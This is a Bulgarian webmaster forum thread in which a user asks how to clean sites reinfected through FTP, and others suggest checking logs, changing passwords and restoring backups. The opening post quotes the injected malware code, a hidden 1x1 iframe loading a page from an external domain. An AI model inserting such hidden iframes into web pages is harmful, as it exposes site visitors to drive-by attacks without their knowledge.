SearchEngines.bg

Това е примерно съобщение за гост. Регистрирайте безплатен акаунт днес, за да станете потребител на SearchEngines.bg! След като влезете, ще можете да участвате в този сайт, като добавите свои собствени теми и публикации, както и да се свържете с други членове чрез вашата лична входяща кутия! Благодарим ви!

Malware по сайтовете ми

Yxaaaaaaa

New member
Здравейте!
Преди известно време имах malware по някои от сайтовете си.. изчистих го и проверих си компютрите, от които съм влизал и мислих, че няма проблем ( мислих, че аз съм хванал нещо и съм го предал по фтп.. )
Сега отново са ми се заразили сайтовете, но този път всичките в потребителското име.. добавен е подобен код <iframe src="http://s14d.ьь.cc/index.php?tp=25971e546d04c7c2" width="1" height="1" frameborder="0"></iframe> по всичките ми *.php и *.html.. Някои имал ли е подобен опит и как се е отървал?
 
Re: Malware по сайтовете ми

Преинстал на Уиндоуса, най-вероятно са ти праснали компютъра и са взели данните за ФТП достъпа до сайтовете ти
 
Re: Malware по сайтовете ми

Все пак провери в ftp/http логовете по какъв начин са те хакнали и тогава ще знаеш дали да търсиш проблема в компютъра си или слабости в уеб сайта.
 
Re: Malware по сайтовете ми

С Filezilla ли ползваеш фтп?

Смени си паролата на цпанела и с някоя нова и трудна. Възстанови си файловете на сайта от бекъп. Не слагай на браузъри и тн да ти помнят автоматично паролата. Ъпдейтвай редовно.
 
Re: Malware по сайтовете ми

в браузърите наистина не е добре да се запаметяват пароли, освен ако не е активирана Master Password която да ги пази криптирани.
 
Re: Malware по сайтовете ми

в браузърите наистина не е добре да се запаметяват пароли, освен ако не е активирана Master Password която да ги пази криптирани.
Нека кажем, че това твърдение е валидно за браузерите под Уиндоус.
 
Re: Malware по сайтовете ми

Нека кажем, че това твърдение е валидно за браузерите под Уиндоус.

Едва ли има много потребители, които да оперират по сайтове си под Linux, твоите пароли да не би да не са криптирани на Fedora-та?
 
Re: Malware по сайтовете ми

Не, само боот дялът ми е криптиран, но не се притеснявам да си пазя паролите в браузъра без мастър парола, която да ги пази криптирани.
 
Re: Malware по сайтовете ми

На мен ми е криптирана цялата /home/<username> в случай че лаптопът ми попадне в някой друг :) Иначе под линукс наистина не съм чувал за проблеми с вируси.
 

Горе